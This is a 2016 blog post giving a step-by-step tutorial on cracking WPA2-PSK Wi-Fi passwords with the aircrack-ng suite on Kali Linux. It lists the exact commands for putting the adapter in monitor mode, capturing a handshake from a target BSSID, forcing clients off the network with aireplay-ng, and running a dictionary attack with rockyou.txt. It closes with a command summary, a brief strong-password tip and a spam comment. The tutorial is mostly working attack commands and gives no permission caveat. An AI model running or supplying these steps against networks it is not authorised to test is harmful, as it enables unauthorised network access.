Saturday, April 23, 2016

Cracking WPA2 Personal (PSK) Wireless Networks

Boot up your Kali Linux box and go to terminal, enter airmon-ng command to verify the wireless interface is up and running.

Looks like my wireless interface name is wlan0. Turn it to monitoring mode by entering airmon-ng start wlan0

Now enter the command airmon-ng again to see the changed name of the interface which will be used hereafter which is "wlan0mon" as you can see in the following capture.

Now lets see what are the available Wi-Fi networks in range by entering the command airodump-ng wlan0mon

Let it run for about a minute to gather information. Here you can see that only 1 wireless network is out there which is on channel 1, using WPA2, PSK (Pre Shared Key). This is the most common type of security implemented in wireless networks today.

Lets now write a file named "HOMECAP" with capturing wireless packets specifically on the BSSID 90:61:0C:27:5D:CB on channel 1. 
The command is airodump-ng -w HOMECAP -c 1 --bssid 90:61:0C:27:5D:CB wlan0mon
"-c 1" is regarding to the channel number 1. If the channel number is 10 use "-c 10" in this command.

Let is run until It captures a Handshake. When it captured a handshake, the output will be like the following.

You must wait for a handshake. It is not that much hard to capture a handshake of an active network because computer often goes to sleep mode, turn off & reboot and asks to reconnect etc. There is also a method of forcing clients to re-authenticate using the command 
aireplay-ng -0 0 -a <BSSID> -c <Client MAC Address> wlan0mon in a separate terminal while capturing packets. But most of the time it will not work in practical environments. 

After a handshake is captured enter ls to see the real name of the written file. 

See, Even though we gave the name as HOMECAP for the file it has changed to HOMECAP-01.cap 

Now lets crack it using a dictionary list. Here I am using the Kali's inbuilt dictionary list of rockyou.txt which is 140 MB. If you are using this dictionary for the 1st time, you will have to 1st extract the tar file in usr/share/wordlists folderThis has almost all the common passwords normally people enter for their wireless networks. There are also very big dictionaries out there which are gigabytes in size which has almost all the possible ASCII combinations.
Enter aircrack-ng HOMECAP-01.cap -w /usr/share/wordlists/rockyou.txt
Let it run until it cracks the password. This may take some time depending on the processing power of your CPU and the strength of the password. For this password it took only about 5 minutes.

Using a very strong password is the only way this can be prevented if your going to use WPA2 PSK..

Commands I entered?

airmon-ng start <physical interface>
airodump-ng <new monitoring interface>
airodump-ng -w <file name> -c <channel number> --bssid <BSSID> <interface>
aircrack-ng <new capture file name> -w /usr/share/wordlists/rockyou.txt


  • September 7, 2017 at 11:22 PM
    Anonymous says:

    This is really interesting, You are a very skilled blogger.
    I've joined your feed and look forward to seeking more of your great post.
    Also, I have shared your site in my social networks!


Post a Comment